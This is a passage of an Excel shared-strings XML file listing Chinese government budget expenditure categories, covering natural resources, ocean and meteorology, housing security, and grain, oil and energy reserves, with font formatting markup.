      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源海洋气象等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源规划及管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源利用与保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源社会公益服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源行业业务管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源调查与确权登记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>土地资源储备支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地质矿产资源与环境调查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地质勘查与矿产资源管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地质转产项目财政贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国外风险勘查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地质勘查基金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>周转金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海域与海岛管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源国际合作与海洋权益维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然资源卫星</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>极地考察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>深海调查与资源开发</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海港航标维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海水淡化</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>无居民海岛使用金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>海洋战略规划与预警监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基础测绘与地理信息监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他自然资源事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象事业机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象探测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象信息传输及管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象预报预测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象装备保障维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象基础设施建设与维修</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象卫星</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象法规与标准</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>气象资金审计稽查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他气象事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他自然资源海洋气象等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他自然资源海洋气象等支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房保障支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>保障性安居工程支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>廉租住房</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>沉陷区治理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>棚户区改造</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>少数民族地区游牧民定居工程</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村危房改造</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共租赁住房</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>保障性住房租金补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>老旧小区改造</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房租赁市场发展</t>
    </r>
  </si>
  <si>
    <t>2210111</t>
  </si>
  <si>
    <t xml:space="preserve">   配租型住房保障</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他保障性安居工程支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房改革支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房公积金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>提租补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>购房补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区住宅</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公有住房建设和维修改造支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房公积金管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他城乡社区住宅支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮油物资储备支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮油物资事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财务和审计支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>信息统计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项业务活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家粮油差价补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮食财务挂账利息补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮食财务挂账消化款</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>处理陈化粮补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮食风险基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮油市场调控专项资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>设施建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>设施安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>物资保管保养</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他粮油物资事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>石油储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>天然铀能源储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>煤炭储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>成品油储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他能源储备支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>粮油储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>储备粮油补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>储备粮油差价补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>储备粮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>库建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>最低收购价政策支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他粮油储备支出</t>
    </r>
  </si>
  <si>
